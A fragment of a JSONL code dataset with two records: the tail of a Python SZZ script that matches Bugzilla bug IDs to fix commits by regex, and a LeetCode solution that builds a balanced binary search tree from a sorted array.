#jmetter\n # pattern=\"[Bb]ug \"+str(bug_id)+\" \" #pde\n #pattern=\"[Ii]ssue #\"+str(bug_id)+\" |[Ff]ixes #\"+str(bug_id)+\" |\"+str(bug_id)+\" \"#jetty \n \n #pattern=str(bug_id)+\" |\"+str(bug_id)+\" -|\"+str(bug_id)+\"-\"\n \n #pattern=\"\\[\"+bug_id+\"\\]\" #maven\n matches=[]\n \n \n for commit in commits_candidate :\n \n \n if re.search(pattern,commit) :\n \n matches.append(commit)\n \n total_matches += len(matches)\n matches_per_issue[bug_id] = len(matches)\n\n if matches :\n selected_commit = commit_selector_heuristic(matches)\n \n if selected_commit :\n # get commit and issue detail\n issue_list[bug_id]={}\n issue_list[bug_id]['hash'] = re.search('(?<=^commit )[a-z0-9]+(?=\\n)', \\\n selected_commit).group(0) \n issue_list[bug_id]['commitdate'] = re.search('(?<=\\nDate: )[0-9 -:+]+(?=\\n)',\\\n selected_commit).group(0) \n issue_list[bug_id]['resolutiondate'] = re.search('(?<=\\nDate: )[0-9 -:+]+(?=\\n)',\\\n selected_commit).group(0) \n issue_list[bug_id]['creationdate'] =str( parse( data[data['Bug ID']==bug_id]['Opened'].tolist()[0]+\" +0000\" ).strftime('%Y-%m-%d %H:%M:%S %z'))\n\n else :\n no_matches.append(bug_id)\n \n\n else :\n no_matches.append(bug_id)\n i+=1 \n print(\"total issues\"+str(data['Bug ID'].count()))\n print('Issues matched to a bugfix: ' + str(data['Bug ID'].count() - len(no_matches)))\n print('Percent of issues matched to a bugfix: ' + \\\n str((data['Bug ID'].count() - len(no_matches)) / data['Bug ID'].count()))\n\n return issue_list ","repo_name":"anwarghammam/Pfa-Project","sub_path":"szz-result/scripts/szz/find_bug_fix_vbugzilla.py","file_name":"find_bug_fix_vbugzilla.py","file_ext":"py","file_size_in_byte":4075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"12032451350","text":"#\n# @lc app=leetcode.cn id=108 lang=python3\n#\n# [108] 将有序数组转换为二叉搜索树\n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def sortedArrayToBST(self, nums: List[int]) -> TreeNode:\n l = len(nums)\n if l == 0:\n return None\n m = l // 2\n return TreeNode(nums[m], self.sortedArrayToBST(nums[:m]), self.sortedArrayToBST(nums[m+1:]))\n# @lc code=end\n\n","repo_name":"nerutia/leetcode_new","sub_path":"108.将有序数组转换为二叉搜索树.py","file_name":"108.将有序数组转换为二叉搜索树.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"}